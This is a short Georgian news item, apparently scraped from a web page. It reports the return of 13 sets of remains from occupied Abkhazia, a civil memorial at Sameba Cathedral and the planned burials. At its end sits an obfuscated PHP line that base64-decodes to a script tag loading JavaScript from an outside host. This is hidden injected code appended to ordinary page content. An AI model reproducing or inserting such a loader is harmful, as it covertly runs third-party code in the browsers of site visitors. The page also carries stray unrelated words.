celsiusi
ავერსი შნაიდერი
ოკუპირებული აფხაზეთიდან 13 ნეშტი გადმოასვენეს - 6 სამხედრო მოსამსახურე და 7 მშვიდობიანი მოქალაქე აფხაზეთის ომის შემდეგ უგზო-უკვლოდ დაკარგულად ითვლებოდა.
 
უკვე თითქმის 1 საათია, სამების საკათედრო ტაძარში სამოქალაქო პანაშვიდი მიმდინარეობს. სამოქალაქო პანაშვიდი ხვალაც გაგრძელდება 11-დან 14 საათამდე, რის შემდეგაც გადმოსვენებულ ნეშტებს დაკრძალავენ. 9 მათგანს სხვადასხვა ლოკაციაზე, საგვარეულო სასაფლაოზე, ხოლო დანარჩენ 4-ს სამხედრო პატივით, დიღმის ძმათა სასაფლაოზე დაკრძალავენ.
 
ადგილზე რამდენიმე წუთის წინ იმყოფებოდნენ საქართველოს საკანონმდებლო და აღმასრულებელი ხელისუფლების წარმომადგენლები, ასევე საქართველოს პრეზიდენტიც.
 
 
1209
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");